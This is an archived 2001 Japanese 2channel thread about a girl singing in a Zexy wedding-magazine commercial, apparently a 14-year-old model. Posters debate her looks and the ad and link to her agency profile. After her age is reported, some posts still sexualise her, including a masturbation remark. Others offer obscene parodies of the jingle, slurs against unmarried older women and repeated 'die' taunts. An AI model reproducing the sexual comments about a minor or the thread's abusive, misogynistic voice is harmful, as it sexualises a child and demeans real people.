2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ゼクシイのCMの女

1 :1:01/09/22 15:33
パパパパーンと歌ってる女が、基地っぽくて恐い。
食われそうです。

2 :提供:名無しさん:01/09/22 15:40
I Love you forever あーなーただけのもの;&herts>>1

3 :提供:名無しさん:01/09/23 01:20
俺、食われたい!
メッチャ好みなんスけど・・・ダメ?

4 :提供:名無しさん:01/09/23 01:38
唇の形がなんとも言えんのう
♥を半角な♥>>2

5 :南無:01/09/23 01:39
肝臓の悪い竹内結子って感じ。

6 :おれも:01/09/23 03:54
大好っき♥

7 :提供:名無しさん:01/09/23 11:23
いいかげん、あの歌を止めてくれんかのぅ。

8 :提供:名無しさん:01/09/23 13:35
>>5
うまい表現だね。

9 :名波さん:01/09/23 13:53
あの女の名前はなんてーの?

10 :名無しさん:01/09/23 16:42
(米倉涼子+竹内結子)/2=ゼクシイ女

11 :提供:名無しさん:01/09/23 19:36
20代は、あのCmみて結婚にあこがれる。
後半になって五月蝿く思える。

あれみてイラついている女、たくさんいるだろうに。
逆効果だよね。あのCMソング

12 : :01/09/23 20:02
毛深そうで臭いのありそうな人

13 : :01/09/23 20:11
とにかく名前知りたい・・・

14 :提供:名無しさん:01/09/23 20:43
夜中によく見かけるね♥

15 :提供:名無しさん:01/09/23 20:56
超かわいいじゃん!
お前ら見る目無し?

16 :提供:名無しさん:01/09/23 21:00
最近やたらとよく見るよ。

17 :提供:名無しさん:01/09/24 02:39
あれだけ完成度高い顔してりゃそりゃ不自由してる女に反発食らうわなぁ……

18 :提供:名無しさん:01/09/24 02:53
ひげが生えてそうな顔。

19 :提供:名無しさん:01/09/24 02:58
東北人っぽくない?

20 :提供:名無しさん:01/09/24 03:02
いろいろ検索したり
CM関係のサイトまわってきたが
情報得られんかったよ
眠れん・・・

21 :提供:名無しさん:01/09/24 03:07
出っ歯で歌いにくそう

22 :提供:名無しさん:01/09/24 03:12
>>21
それはそれで(・∀・)イイ!!

23 :提供:名無しさん:01/09/24 03:16
あのCM、相手の男が出てこないのが好印象かも。
男としては。
この(orこんな)娘と結婚したいと思わせる。

24 :提供:名無しさん:01/09/24 03:22
何歳ぐらいなんだろう?
俺には18〜20前後に見えるんだが、、、
やっぱ、あの手の雑誌を愛読する年代なんだろうか?

25 :提供:名無しさん :01/09/24 03:45
今調べたら14歳って・・・
俺もロリコンの仲間入りか・・・

26 :提供:名無しさん:01/09/24 04:10
ぬう、、、14歳かぁ、、、
前任者よりははるかに若いと思ったんだが、そこまでとは、、、

27 :提供:名無しさん:01/09/24 04:40
>>25
ソースは?

あ、醤油はいらないよ、マヨネーズも。

28 :提供:名無しさん:01/09/24 04:43
ttp://www.glico-dairy.co.jp/product/tvcm/movie/putchin3.mov
上の動画じゃよくわからん
どっかに画像ないかね

29 :提供:名無しさん:01/09/24 04:48
CUTiE 買えばよろし。

30 :28:01/09/24 04:48
ttp://www.nowflying.co.jp/NFA/Japan/allperson.html
ココに画像あるが小さすぎ

31 :28:01/09/24 04:52
>>29
明日見てみる
チト、ハズカシイガ・・・

32 :提供:名無しさん:01/09/24 06:24
前の顔にキズがある上にブッサイクな女よりはマシだが、
だからってアップに堪える顔じゃない。
本当にイヤダ、このCM。

33 :提供:名無しさん:01/09/24 06:53
>>30
3段目右端の加賀美聖良?
ttp://www.nowflying.co.jp/NFA/Japan/seira.htm

34 :33:01/09/24 07:34
別スレでガイシュツだったヨ...
http://mentai.2ch.net/test/read.cgi?bbs=cm&key=1001257959

35 :提供:名無しさん:01/09/24 07:52
>32 醜い嫉妬だなあ。あんたが可哀想だから千円寄付してやりたい。

36 :CM@名無しさん:01/09/24 11:05
宮本真希じゃないの?

37 :提供:名無しさん:01/09/24 11:22
>>35
素直に「好きで好きで夜も眠れませ〜ん」って言えよヴァカ(プ

38 :提供:名無しさん:01/09/24 12:02
またブサイク論争かよ(ワラ
基本的に不自然に眉をいじってない女は、
俺的には好感度は高いが、
かといって、やたら顔面をドアップにするCMは不快だな。
このCMは微妙だけど不快

39 :提供:名無しさん:01/09/24 12:04
おまえら何様だかなぁ。笑えるよ。

40 :提供:名無しさん:01/09/24 12:17
>>39
「おまえら」がコテハンじゃないし、姿の見えないゲリラみたいだから
タチが悪い。どっかに集まっててくれたらあぼ〜ん!するのに・・・。(w

41 :1:01/09/24 18:01
けっこうみんな好きなんですね。
確かにかわいいかもしれないけど、おれは生理的にダメ。
手をもじもじさせながら歌うとこがキチっぽいし、歌詞もサムイ。

42 :提供:名無しさん:01/09/24 18:04
>>37「好きで好きで夜も眠れませ〜ん」
こんな恥ずかしい言葉は死んでも出てこん。語彙の中にあると思うだけで辛くなる。
CMの女はどうでもいいが、お前とか>>32なんかは心の底から哀れに感じるわい。
可哀想だから嘲笑ったり罵倒したりはしないでやるからな。

43 :提供:名無しさん:01/09/25 01:09
顔だけで手淫できたが何か?

44 :提供:名無しさん:01/09/25 07:58
何も
漏れは15秒じゃ無理だが30秒なら逝けそうだ

45 :提供:名無しさん:01/09/25 08:15
特別かわいいわけでもなら良いんだろう

46 :提供:名無しさん:01/09/25 13:06
歌いだすときに横から出る舌が気持ち悪い・・・。

47 :提供:名無しさん:01/09/25 14:48
BA-TSUの(ほぼ)専属モデル。

48 :提供:名無しさん:01/09/25 15:19
あの眉で?!

49 :提供:名無しさん:01/09/25 16:01
>>42
その割に、相手にせずにはいられないところに人間としての浅さが伺えますね(ワラ

50 : :01/09/25 16:48
14歳


http://anny.kir.jp/bbs2/img-box/img20010915212417.jpg

51 :提供:名無しさん:01/09/25 17:03
>>50

これは何という生物なのですかっ!

52 :提供:名無しさん:01/09/25 19:31
>>50 ヒサビサニワラタヨ

53 :提供:名無しさん:01/09/25 19:33
このCM、超不快、もう勘弁して〜

54 :提供:名無しさん:01/09/25 20:07
あの子めっちゃかわいい。
深夜によく流れるが、同じく深夜によく流れるハウスの糞CMとは雲泥の差。
一晩中流して欲しいね。

55 :提供:名無しさん:01/09/25 20:17
http://www.geocities.co.jp/SilkRoad-Ocean/9514/seira-profile.htm
是でいいかい?
かんしゃしてちょ♪

56 :提供:名無しさん:01/09/25 21:44
>>49 ゴキブリやダニを潰したくなるのは正常な感覚じゃないか。

57 :提供:名無しさん:01/09/25 22:05
なんか見た事あるなあと思ったら高橋尚子か?

58 :名無しさん@1周年:01/09/25 22:16
>>50 ←豚なっちのアイコラ。危険。

59 :提供:名無しさん:01/09/25 22:21
>>50 キティちゃんと熊のぬいぐるみがプリティ。それだけで許す。

60 : :01/09/25 22:38
前のよりはましになった。
前はぶさいく&歌の声質がみみざわりだった。

とはいえこのCMは嫌い。

61 :提供:名無しさん:01/09/25 22:45
へぇ?14歳の加賀美とかいう女の子?マジ?
今のいわゆる「結婚雑誌ブーム」って、第2時ベビーブーマーの昭和46年前後である
29,30歳前後がピークなのではないの?
逆に言えばその世代で売れ残っている30歳になりそうなおばちゃん達の
神経を逆なでしかねないのに・・??ねえ

62 :提供:名無しさん:01/09/25 23:58
14さいですか。とりあえず、抜いておきました。

63 :提供:名無しさん:01/09/26 00:30
パッと見た感じの印象は、良くはなかったです。

64 :提供:名無しさん:01/09/26 07:49
14歳か・・・対象外でざんねん

65 :提供:名無しさん:01/09/26 08:37
>>56
相手にしないって宣言しておいて、
そのセリフはいただけませんなぁ(ワラ

66 :提供:名無しさん:01/09/26 08:43
しかし、顔が似てるとなんとなく声まで似ているように感じる・・・

67 :提供:名無しさん:01/09/26 11:44


68 :提供:名無しさん:01/09/26 12:10
こんなCMを流すから淫行嬢霊違反が減らないんだ。
青少年に悪影響を与えるCMはそっこく中止せよ。

69 :提供:名無しさん:01/09/26 13:08
「ゼクシィ」ロリCMは完全に失敗だね。男側からすれば
少女っぽい花嫁がイイッ!て思っている奴もいるかもしれないが、
「ゼクシィ」の購買者はほぼ100%女性。しかも61さんが指摘する
とおり20代後半こそが結婚を真剣に考えてるだろうに、反感買うのは
当然だろう。逆に冴えないタイプの女が結婚を間近に控えてキレイに
変身・・・みたいなCMの方が「ゼクシィ」読者には受けると思うが。

70 :提供:名無しさん:01/09/26 13:16
今時は14才で花嫁なんて、
学校中退のヤンキーしかいない

71 :提供:名無しさん:01/09/26 13:36
>70
14歳で結婚は法的に無理。しかも中学は義務教育のため中退も無理。

72 :提供:名無しさん:01/09/26 17:30
age

73 :提供:名無しさん:01/09/26 17:35
はっきり言ってむちゃくちゃ可愛いよ。

74 :提供:名無しさん:01/09/26 20:08
>>65 >相手にしないって宣言しておいて、
何処にそんな事が書いてある?妄想で一人で楽しむなよ。
お前もしかして***だろ?

75 :提供:名無しさん :01/09/26 23:16
いや、でも最初みたときから14歳ってわかった?
多分ほとんどの人がただの若い花嫁だと思って終わりじゃない?
可愛い花嫁になりたいなー願望は20代後半でもあるでしょう。
きっとそっち方面でアピールしたと思われ。
>69さんの路線で行くなら
相手の男性と2人で一緒とかのほほん幸せ風味?
地味系のきれいなお姉さんでひとつ。

76 : :01/09/26 23:19
>>69
素人のくせに生意気だぞ

77 :提供:名無しさん:01/09/26 23:21
あのCMでは可愛い

78 :提供:名無しさん:01/09/26 23:27
>>69 それはダメだな。ほら昔やってた篠原ともえのやつとか。
ああいうマジっぽいのは反感を増幅するだけだよ。

79 :じゃいあん:01/09/26 23:32
>>69
のび太のくせに生意気なんだよ

80 :提供:名無しさん:01/09/26 23:35
>78
よっぽどこのCMが好きなんだね。でもこのレス読む限りロリヲタしか
好んでないみたいだけど(プププ

81 :提供:名無しさん:01/09/27 00:08
>>80
>このレス読む限りロリヲタしか 好んでないみたいだけど
かなり無理のある分析ですな。

82 :提供:名無しさん:01/09/27 00:11
かわいいけど生理的に受け付けなかったのは14歳だったせいか。

83 :提供:名無しさん:01/09/27 00:30
周防玲子じゃなかったのね・・・。

84 :提供:名無しさん:01/09/27 00:41
たしかにCMとしてはどうかと思うが(「結婚すればいいじゃん」はねえだろ)、
あの女の子はカワイイと思う。

85 :提供:名無しさん:01/09/27 00:59
>>84
あの一言はホント不快感だけだな。

86 : :01/09/27 01:11
>>17 ドウイウ美的感覚してんだよ、出っ歯じゃんねえ>>21

>>35お前がロリで何言おうが気色悪いもんは気色わるいんだよ
   って言うか千円くれ。

>>49うまい!一本!49の勝利!!>>42ペラペラ人間決定!!

87 :提供:名無しさん:01/09/27 01:45
あれだけアップにしても放送に耐えられるのは、やはり10代の若さだね。

88 :提供:名無しさん:01/09/27 02:00
結婚すればいいじゃん

89 :提供:名無しさん:01/09/27 02:04
結婚したい

90 :提供:名無しさん:01/09/27 02:18
結婚すればいいじゃん

91 :提供:名無しさん:01/09/27 02:22
じゃ、おれと結婚すれ。

92 : ◆6JaqYY2A :01/09/27 02:25
これで過敏に反応してる連中って、
余程醜いんだろうね。

93 :提供:名無しさん:01/09/27 02:25
>>97
俺は絶えられない

94 :提供:名無しさん:01/09/27 02:26
>>87
俺は絶えられない 

95 :提供:名無しさん:01/09/27 02:26
整形すればいいじゃん

96 :提供:名無しさん:01/09/27 02:27
>>94
がまんすればいいじゃん

97 :提供:名無しさん:01/09/27 02:42
不快のガン細胞まき散らしてんじゃねえ!

98 :提供:名無しさん:01/09/27 02:45
要するに、もてないのを僻んでんのね。

99 :提供:名無しさん:01/09/27 02:48
あれ、小学生くらいでしょ

100 :提供:名無しさん:01/09/27 02:48
>>98
カン違いしてればいいじゃん

101 :提供:名無しさん:01/09/27 02:53
>>98
何故そうなる

102 :1:01/09/27 03:08
最近全く気にならなくなった。
慣れって恐いね。

103 ::01/09/27 03:15
俺は、好き!
しかし14歳とは!

104 :提供:名無しさん:01/09/27 03:16
>>102
にせもの

105 :提供:名無しさん:01/09/27 03:19
>>102
ドクソ

106 ::01/09/27 03:21
っつーかマジかわいいんだけど〜!

107 :提供:名無しさん:01/09/27 03:24
ゼクシイのまわし者ばっかし

108 :1=102:01/09/27 03:29
ほんものなんだけど、、、

109 :提供:名無しさん:01/09/27 03:30
廃刊すればいいじゃん

110 :お答えさん:01/09/27 04:08
http://www.nowflying.co.jp/NFA/Japan/seira.htm

画像なしですが事務所HPのプロフィールです

111 :提供:名無しさん:01/09/27 05:08
私女だけど、可愛いと思ったよ。
素肌っぽさを感じたのは14歳だったからなんだね。

112 :提供:名無しさん:01/09/27 09:10
素直に見ればそうなんだけど荒らす奴は女に何か嫌な思いがあるんだろうな。
もしくは女を余り見たことが無いんで不安なのかも知れないな。

113 :提供:名無しさん:01/09/27 09:33
>>112
アフォですか?

114 :提供:名無しさん:01/09/27 09:47
男の99%は結婚したいとは思っていません。
結婚は男にとってデメリットが大きいからです。
結婚は人生の墓場という名言もあります。
また、結婚した99%の女も結婚を後悔しています。
結婚は人生の墓場。

115 :提供:名無しさん:01/09/27 10:44
>>114
そりゃいくらなんでも大袈裟だよ。
結婚願望もってる男はDQNなヤツラを中心に結構いると思うよ。

116 :提供:名無しさん:01/09/27 13:23
あの女の子には罪はないと思う。でも「パパパパーン」っていう歌い方が
なんか小バカにされたように感じるのかも。
あれがただのBGMだったら別に良かったよ。

117 :提供:名無しさん:01/09/27 13:29
歌の問題かねえ

118 :提供:名無しさん:01/09/27 13:31
年増&外見コンプレックスのある女は
どうやっても受け入れられねえんだろうな

119 :提供:名無しさん:01/09/27 13:35
おれ男だよ

120 :提供:名無しさん:01/09/27 13:37
フォモの人でしたか、こりゃ失礼

121 :提供:名無しさん:01/09/27 13:48
>>120
何故そこまでムキになる

122 :提供:名無しさん:01/09/27 13:54
チャットする奴はヨソでしろ
□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□
□□□□□■■□□□□□□■□□□□□□□□□□□□□□□□□□□□□□□□□■□□
□□□□□■■□□□□□□■■□□□□□□□■■■■■■■■■■■■■■■■■■■□
□□□□□■□□□□□□□■■□□□■□□□□□□□□□□□□□□□□□□□■■■□
□□■□■□□□□□□□□■■■■■■■■□□□□□□□□□□□□□□□■■■□□□
□□□■■□□□■□□□■■□□□□■■□□□□□□□□□□□□□□□■■□□□□□
□□□□■■□■■■□□■□■□□■■■□□□□□□□□□□■■■■■□□□□□□□
□□□□□■■■□□□■□□■□□■■□□□□□□□□□□□□■■□□□□□□□□□
□□□□□■■■□□■□□□□■■■□□□□□□□□□□□□□■■□□□□□□□□□
□□□□□■□□■□□□□□□■■□□□□□□□□□□□□□□■■□□□□□□□□□
□□□□■□□□■■□□□□□■■□□□□□□□□□□□□□□■■□□□□□□□□□
□■■■■■■■■■□□□□■□□■■□□□□□□□□□□□□■■□□□□□□□□□
□■■□□■■□□■■□□■□□□□■■■□□□□□□□□□□■■□□□□□□□□□
□□□□□■■□□■□□■□□□□□□■■■■□□□□□□□□■■□□□□□□□□□
□□□■□■■□□□□■□■■□□□□□■■□□□□□□□□□■■□□□□□□□□□
□□□■■■■□■□■□□□□■■□□□□■□□□□□□□□□■■□□□□□□□□□
□□□■□■■□■■□□□□□□■■□□□□□□□□□□□□□■■□□□□□□□□□
□□□■□■■□□■□□□□□□■■□□□□□□□□□□□□□■■□□□□□□□□□
□□■□□■■□□■■□□■□□□□□□□□□□□□□□□□□■■□□□□□□□□□
□□■□□■■□□■□□□□■■□□□□□□□□□□□□□□□■■□□□□□□□□□
□■□□□■■□□□□□□□□■■■□□□□□□□□□□■■■■■□□□□□□□□□
□□□□□■■□□□□□□□□□□■■□□□□□□□□□□□■■□□□□□□□□□□
□□□□□■■□□□□□□□□□□■■■□□□□□□□□□□■□□□□□□□□□□□
□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□

123 :提供:名無しさん :01/09/27 13:58
>>122
ハァ?

124 :提供:名無しさん :01/09/27 14:06
打ち切り希望

125 :提供:名無しさん:01/09/27 14:17
>>116
でも、そう唄ってるのはあの女なわけだから、罪はある。

126 :Skipper:01/09/27 14:18
相当ひねた性格しちゃってるね、かわいそ〜

127 :提供:名無しさん:01/09/27 14:49
ロリコンも歪んでるよね

128 :::01/09/27 15:30
若さをねたむヴァヴァアばっかだね、しね。
ネナベのヴァヴァアし値よ!!

129 :提供:名無しさん:01/09/27 16:45
大人の女を相手に出来ないロリヲタこそ社会のゴミ

130 :提供:名無しさん:01/09/27 16:48
また最低レベルのくだらない争いが

131 :提供:名無しさん:01/09/27 16:49
CM見た時点では歳は分からないんだから、それで妬んでる女なんていないんじゃないの?

実際歳のこと文句言ってる意見無いし。

132 :提供:名無しさん:01/09/27 16:52
擁護派は何故かsageたがる(w

133 :提供:名無しさん:01/09/27 16:56
そして二言目には「氏ね」
他に語彙はないのか?(大藁

134 :提供:名無しさん:01/09/27 17:29
っていうかゼクシィよりけっこんぴあの方が情報料が多いし読みやすいからいいんだよね
ゼクシィって大雑把だし
ホントあのCMで知名度だけ上げても、CMの評判は良くないだろうし
ただ金はかかってないよね、無名の若いタレント歌わせてるだけだから。
広告いっぱい打てるのは単純に制作費かかってないだけだからだろうね

135 :n七氏:01/09/27 18:49
             / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
      ∧_∧   < まぁ落ち着けよ、ババァ
     ( ´_ゝ`)   \________
    /     \
   / /\   / ̄\
 _| ̄ ̄ \ /  ヽ \_
 \ ̄ ̄ ̄ ̄ ̄ ̄ \__)
  ||\            \
  ||\|| ̄ ̄ ̄ ̄ ̄ ̄ ̄|| ̄

136 :提供:名無しさん:01/09/27 18:52
そのパパパパーンっていう歌が毎度毎度ヤバいの!

137 :ななしさん:01/09/27 18:57
リクルート嫌いだから、この会社の雑誌は一切買わない。

ゼクシイ、じゃらん、住宅情報、あとなんだっけ。
とにかく、きりゃい。

138 :提供:名無しさん:01/09/27 19:10
結婚すればいいじゃん

139 :提供:名無しさん:01/09/27 19:13
>>135
お、ジャリがしゃべった(ワラ

140 :提供:名無しさん:01/09/27 21:53
最初見たとき20台半ばに思った。
14歳って知って「えっ?」って感じ。
とりあえず、こういう場で150人近い人が直接反応したってことは
CMとしては成功なのでは?

141 :つーか:01/09/27 22:02
この本のCMは全て不快。
これ見て本買いたくなる女いるのか?

142 :提供:名無しさん:01/09/27 22:16
正直生理的に受け付けない。
気持ち悪い。
竹内結子を100倍くらい気持ち悪くした感じ。

143 :名無しチェケラッチョ♪:01/09/27 22:48
パパパパーン
アイラビューフォエバー
あなただけの・・・・
続きはどうなってんだろ?誰か知らない?

144 :提供:名無しさん :01/09/27 23:22
パパパパーン
アイラビューフォエバー
あなただけのマンコ

これに決まってるだろ?

145 :提供:名無しさん:01/09/27 23:23
>>142
100倍って・・・
竹内結子の気持ち悪さはどのぐらいなんですか?

146 :(。^〜^。)つ◎ ◆nwG8G59Y :01/09/27 23:24
>>143
そこが狙いだったりしてね。
キーコーヒーの「コーヒーを入れたから・・少し、話そうよ。みんな・・」
みたいな。

147 :提供:名無しさん:01/09/27 23:25
パパパパーン
アイラビューフォエバー
あなただけのアナル

これに決まってるだろ?

148 :提供:名無しさん:01/09/27 23:54
>>145
ほとんど気持ち悪くないが、100倍にするとたいしたもの。

149 :提供:名無しさん:01/09/28 00:08
>>143
http://www.isize.com/marriagelife/mar/news/cd_02.html

150 :今週のハイライト:01/09/28 01:06
パンパカパーン、パンパンパンパンパカパーン

151 :提供:名無しさん:01/09/28 01:18
>>148
あの歌のタイトルって、「パパパパーンの歌」なの?

152 :提供:名無しさん:01/09/28 01:44
女が悪いんじゃなくて、CM作った奴が悪いと頭では分かってるんだが、
坊主憎けりゃ袈裟まで憎い、ってとこだな。ハァ〜

153 :提供:名無しさん:01/09/28 02:45
黒木瞳に似てないか?

154 :提供:名無しさん:01/09/28 03:54
>>140
いやぁ、どう見てもティーンネイジャーだろう
最初見たとき16くらいかな?と思ったよ
だが14歳だったとは!

20台半ばにはあのような瑞々しさはないと思う(w

155 :提供:名無しさん:01/09/28 03:55
パパパパーン
アイラビューフォエバー
あなただけの餅

これに決まってるだろ?

156 :提供:名無しさん:01/09/28 03:56
>>110
プッチンプリン可愛かったよ

157 :提供:名無しさん:01/09/28 06:14
パパパパーン
アラ-ビューフォエバー
あなただけの(ワラ

これに決まってるだろ?

158 :提供:名無しさん:01/09/28 07:09
あ〜不快だ不快だ不快だ

159 :提供:名無しさん:01/09/28 07:22
売れ残りってウザいね。

160 :あほか:01/09/28 07:28
逆だ。結婚したくない独身貴族の男なのオレは。
そちらこそリクルートのマワシものなんじゃないのか?

161 :提供:名無しさん:01/09/28 07:34
あれ、なんか反応してるYO
おもろ〜

162 :あほか:01/09/28 07:39
中途半端に押し付けがましいから超ウルトラ不快なんだよ。
「結婚すればいいじゃん」←おそらく糞ブス女が開発した造語

だったらまだ「結婚しろよ」の方がまだ俺は気持ちが良い。

163 :あほか:01/09/28 07:41
相当ひねくれ者だな。

164 :提供:名無しさん:01/09/28 07:48
独 身 貴 族 た ん は な ぜ 怯 え て い る の ?

165 :提供:名無しさん:01/09/28 07:52
>>164
怯える?なんでそうなるんだ?
もっとマシな煽りしろ。

結局、リクルート関係者なんだろ。

166 :提供:名無しさん:01/09/28 07:55
「結婚すればいいじゃん」
これ、おそらく君のような糞ブス女が開発した造語なんだろうな。

167 :提供:名無しさん:01/09/28 08:00
このCM、好きな奴って一体どういう感性してんだ?
信じられん。

168 :提供:名無しさん:01/09/28 08:08
はりきってまーす!
感がウザイ

169 :提供:名無しさん:01/09/28 08:08
俺は仮面貴族

170 :提供:名無しさん:01/09/28 08:26
あの女キモイ

171 :提供:名無しさん:01/09/28 08:36
つうか、クデエ顔

172 :提供:名無しさん:01/09/28 08:37
つうか、具がでけえぞ

173 :提供:名無しさん:01/09/28 08:38
いやちゃうわ、顔がでけえんだ

174 :提供:名無しさん:01/09/28 08:39
うんこみたい

175 :提供:名無しさん:01/09/28 08:51
>>167
まったくだ。
既婚・未婚云々じゃなくて、生理的に受け付けない。
あのCM自体もウザいが、あれをいいと思っているヴァカは激しくキモい。

176 :だめだこいつら:01/09/28 09:23
チャットがしたくて、どうにかして反論を引き出したいバカ。
2ちゃんに溺れるヒマオタ哀れ。

177 :提供:名無しさん:01/09/28 09:44
食事中には流さないでほしい。

178 :提供:名無しさん :01/09/28 09:50
>>176
反論する奴なんていないだろう

179 :ヴァヴァアばっかりだね:01/09/28 11:54
でも売れ残りシワシワ30ババアからすれば、むかつく
CMだよね。自分より明らかに可愛い若い女の子が結婚
雑誌のCMでてるんだからね(激w。立場ないよね。
つかあのCM見るたび煽られてるような被害妄想に陥るんだろうね、
結婚できないオヴァチャン達は(超w!!はやくしんでくださ〜い!!

180 :提供:名無しさん:01/09/28 12:00
なんで擁護派はアンチを煽るのかね(w

181 :提供:名無しさん:01/09/28 12:32
>>180
面白いからじゃないの?
俺も観てて面白い。

182 :提供:名無しさん :01/09/28 12:41
>>181
でも煽りがワンパターンで意味不明なんだよね。

ツッコミは面白い。

183 :提供:名無しさん:01/09/28 12:46
あのパパパパーンという変なアレンジの曲さえ消えれば
別にどうでもいいです
関係無いもん
三十路ババアじゃ無いから。

184 :こがね:01/09/28 13:34
>>179
おまえのうんこ何色?

185 :提供:名無しさん:01/09/28 13:43
>>179
煽動すればいいじゃん

186 :提供:名無しさん:01/09/28 13:46
>>180
淋しいからか、ヒマだからか、単なるひねくれヴァカだからじゃねえ?

187 :提供:名無しさん:01/09/28 13:51
というより、掲示板界のテロだろ。

188 :提供:名無しさん:01/09/28 14:04
>>179
煽ってるほうが必死なのも藁える
(激w(超w←これってはやってんの?

189 :提供:名無しさん:01/09/28 17:00
このスレ笑える

190 :提供:名無しさん:01/09/28 17:03
逝き遅れが強迫観念に駆られて、
ノイローゼ寸前になってる模様。
そして童貞も。

191 :提供:名無しさん:01/09/28 17:56
好みじゃないとか言うのならまだ分かるけど、
ブスとかきもいとか、端で見てて笑える。

192 :提供:名無しさん:01/09/28 17:57
>>190
逝き遅れでも、童貞でもないけど、そこまでひねくれた下劣な言動を
故意に繰り返す人間になれるのは、自分の事だからか?自己憎悪で。
それか逆に離婚寸前とか、或いは、無職ダメとか、ヒッキーとか、
イジメられっ子だったとか、etc・・・

何をやっても恵まれない、何らかの社会への憎悪や挫折感がある
人間でなければ、そこまで卑劣な言動をいつまでも執拗に続ける
人間にはならないもんだよ、普通。

とても可哀想な人間なんだな、君は。

まあ、いずれ警察のお世話にでもなりなよ。
その為の税金なんだし。

193 :提供:名無しさん:01/09/28 18:01
>>192
最高に藁える

194 :提供:名無しさん:01/09/28 18:11
>>192
自分の事言ってんだろうな(ワラ

195 :提供:名無しさん:01/09/28 18:11
そして心で泣け。

196 :提供:名無しさん:01/09/28 18:15
>>193.194
どこまで行ってもクズはクズか?

197 :ヴァヴァアばっか・・・:01/09/28 18:17
この板にいるどの女よりもこのCMの女の子1000倍は可愛いよ。
この子がブサイクとか言ってる奴本当に頭大丈夫?ブスが吠えてるんじゃないよ。
逝き遅れどもが!!!はやくしね。クサイクサイ

198 :提供:名無しさん:01/09/28 18:23
>>197
君の感性とみんなの感性が違うからだろよ。
君だって嫌いなもんあるだろ。それがここのみんなが嫌いと言う
訳ではないでしょう?その逆もまた真なりだよ。

199 :提供:名無しさん:01/09/28 18:27
そうか、そのヴァヴァアに何かトラウマがあるんだな、君は。
良く分かった。

200 :提供:名無しさん:01/09/28 18:36
>>197
オマエもいずれジジ、ババになるんだぜ。
ジジ、ババになったら、今日言った自分の言葉を思い出せ。

201 :提供:名無しさん:01/09/28 18:48
つーか、10年後、20年後の自分に言ってやれよ、厨房(藁

202 :提供:名無しさん:01/09/28 20:53
あの女の子、かわいい。はぁはぁってかんじ。

203 :???:01/09/28 22:06
>>180 >なんで擁護派はアンチを煽るのかね(w
何で?逆だろ。どう見ても煽ってるのはブスとか逝ってる方だろが。
煽りという言葉の意味がわかってるか?
>>182も論理が逆さま。自己弁護で『面白い』なんて言ってるのが哀しいけどな。
>>198も青臭い。こういう半端な一見マジレスはやめてくれ。
もしIDが出てたら同じ奴ばっかり書き込んでるのが分かるんだろうが…。

204 :提供:名無しさん:01/09/28 22:14
>>203 あなたもすぐ程度の低い攻撃にさらされてしまうよ。

205 :提供:名無しさん:01/09/28 22:19
>>203
俺が思うに、煽りの方がCMから離れて、レスに対しての罵倒しか
してないんだな。それも常套的だから、しらけちゃってて
相乗効果で盛り上がるような良い意味の争いになってないんだな。

206 :提供:名無しさん:01/09/28 22:25
要はあの女について語ればいいのに、勝手にアンチの素性まで決め付けるなっての。

207 :名無しさん:01/09/28 22:31
180から190あたりは多分1人でスレを伸ばしてるね
文体が同じだし,書きこの間隔がほぼ一定だ(藁

208 :提供:名無しさん :01/09/28 22:37
>>206 こう言うのがツマンネーんだよ!ヴァヴァア!!

209 :ちょっと聞くが…:01/09/28 22:43
>>206
お前自分のしてる事分かってんのか?もう一度この板を見直してみろ。
自分の事を棚に上げるのも程々にしとけよ。

210 :提供:名無しさん:01/09/28 22:58
ようするにこの女を好きな奴っていうのはキモイ奴が多いわけだ。

211 :提供:名無しさん:01/09/28 22:59
別にCMの女がキモイと思ったことは無い。
綺麗とは思うが、印象が薄い。
というよりも、CMが激ヘタクソでターゲット選定がメチャクチャな上にヘボ雑誌だなと思う。
所詮上っ面。

212 :提供:名無しさん :01/09/28 23:05
>>210
もう駄目だね(ワラ 力が抜けててもはやフニャフニャ。
降伏宣言と思われ(嘲笑

213 :三村:01/09/28 23:10
>ようするに
まとめちゃったよ! 終わりかよ! 投げ出すなよ!

214 :>207:01/09/28 23:16
167〜175も同様。後半なんて一分刻みだもん(ゲラ
朝からよく遣るよね。カワイソ

215 :提供:名無しさん:01/09/28 23:22
クソブスじゃん

216 :提供:名無しさん:01/09/28 23:24
>>212
お前のレスみてると210の意味がよくわかるわ。
お前キモイよ。消えろ。

217 :提供:名無しさん:01/09/28 23:24
ガキか?暴れてるヤツは。

218 :提供:名無しさん:01/09/28 23:26
ガキは都合のいい解釈が好きだよね

219 :提供:名無しさん:01/09/28 23:26
>>216
被害妄想者だろう、おそらく。

220 :提供:名無しさん :01/09/28 23:33
210=216 また自演・・・本当情けない。
上の4つも全部同じ奴だな。

221 :提供:名無しさん:01/09/28 23:35
>>220
いくらお前がひとりで真っ赤な顔しながらひたすら書き込んでる
からって、他の人間も同じ事してると思うな。

ちなみに俺は210だが、初めての書き込みだ。

222 :提供:名無しさん:01/09/28 23:36
あのさー期待してんだからガキとかじゃなくて
もっとグサっとくるような煽りをしろよ たのむよ〜〜

223 :提供:名無しさん:01/09/28 23:37
>>220
おまえアタマおかしいんじゃねえの?
精神病院逝ってこい!

224 :提供:名無しさん:01/09/28 23:45
自演じゃないけど同じような文体の奴らが突然まとめて出てきたから
そう見えなくも無いね。

225 :提供:名無しさん:01/09/28 23:51
>>223 他人のことは言えない。このスレを見ててつくづく思う。

226 :名無しさん:01/09/28 23:53
なんか今日は反応が悪いんでない?

227 :提供:名無しさん:01/09/28 23:56
>>225
はたから見て、俺にはキティにしか見えんがな。

228 :提供:名無しさん :01/09/28 23:57
>>226
ロリヲタ氏ね!というのが出てこないね。

229 :206:01/09/29 00:11
>>208-209
だから勝手に決めるなって。
俺は男だしあんたらの事悪く言ったことは無いよ。
あの女は嫌いだけど。

230 :提供:名無しさん:01/09/29 00:37
逝き遅れが強迫観念に駆られて、
ノイローゼ寸前になってる模様。
そして包茎も。

231 :提供:名無しさん:01/09/29 00:41
192はコピペ。

232 :提供:名無しさん:01/09/29 00:44
>>230
真性ドクソ決定

233 :提供:名無しさん:01/09/29 00:44
はじまったよ
ワンパターン(w

234 :190:01/09/29 00:50
あ〜〜おもしろい。
192が過剰反応してるところを見ると、
当たりのようだな、ついでにデブか極細がりがり、
海やプールで自分の体にコンプレックスを感じるタイプだな、
色白で、理屈屋、髪は理容院で切ってもらってる。
美容院には行けないタイプ。

ソレハオメーダロっていうのは無しね。

235 :提供:名無しさん:01/09/29 00:54
